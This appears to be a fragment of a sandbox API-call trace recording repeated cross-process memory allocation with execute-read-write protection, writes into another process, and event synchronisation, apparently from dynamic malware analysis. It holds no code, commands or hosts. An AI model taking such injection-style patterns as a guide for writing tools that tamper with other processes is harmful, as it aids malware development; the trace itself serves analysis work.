NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.366] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.366] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.367] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.367] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.367] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.367] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.367] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.367] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a098, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.367] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.367] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949c46*, NumberOfBytesToWrite=0x18, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949c46*, NumberOfBytesWritten=0x28df88*=0x18) returned 0x0 [0140.368] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.368] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.368] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.368] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.368] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.368] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.368] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.368] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.369] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.369] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.369] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20028, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.369] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.369] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0a0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.369] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x22, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.369] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f92*, NumberOfBytesToWrite=0xa, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f92*, NumberOfBytesWritten=0x28df88*=0xa) returned 0x0 [0140.369] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.369] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.370] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.370] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.370] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.370] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.370] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.370] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.370] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.370] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.371] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x2001a, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.371] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.371] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0a8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.371] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.371] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949f9e*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949f9e*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.371] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.371] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.371] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.372] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.372] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.372] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.372] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.372] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.372] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.372] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.372] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.372] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.372] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0b0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.373] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2a, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.373] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949fb2*, NumberOfBytesToWrite=0x12, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949fb2*, NumberOfBytesWritten=0x28df88*=0x12) returned 0x0 [0140.373] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.373] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.373] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.373] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.373] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.373] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.374] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.374] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.374] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.374] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.374] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20022, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.374] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.374] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0b8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.374] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.374] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949c32*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949c32*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.375] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.375] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.375] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.375] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.375] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.375] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.375] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.418] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.418] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.418] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.419] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.419] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.419] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0c0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.419] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x31, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.419] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949fc6*, NumberOfBytesToWrite=0x19, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949fc6*, NumberOfBytesWritten=0x28df88*=0x19) returned 0x0 [0140.419] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.419] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.420] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.420] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.420] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.420] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.420] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.420] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.420] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.420] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.421] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20029, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.421] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.421] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0c8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.421] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x29, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.421] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949fe2*, NumberOfBytesToWrite=0x11, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949fe2*, NumberOfBytesWritten=0x28df88*=0x11) returned 0x0 [0140.421] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.421] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.421] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.421] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0140.422] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0140.422] NtClearEvent (EventHandle=0x144) returned 0x0 [0140.422] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0140.422] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0140.422] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0140.422] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x640000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0140.422] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20021, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0140.422] NtFreeVirtualMemory (ProcessHandle=0x138, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0140.422] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x14002a0d0, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0140.423] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2f, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0140.423] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x949ff6*, NumberOfBytesToWrite=0x17, NumberOfBytesWritten=0x28df88 | out: Buffer=0x949ff6*, NumberOfBytesWritten=0x28df88*=0x17) returned 0x0 [0140.423] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0140.423] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0140.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x640000, RegionSize=0x28de48*=0x1000) returned 0x0 [0140.423] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0140.423] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x640000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x640000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 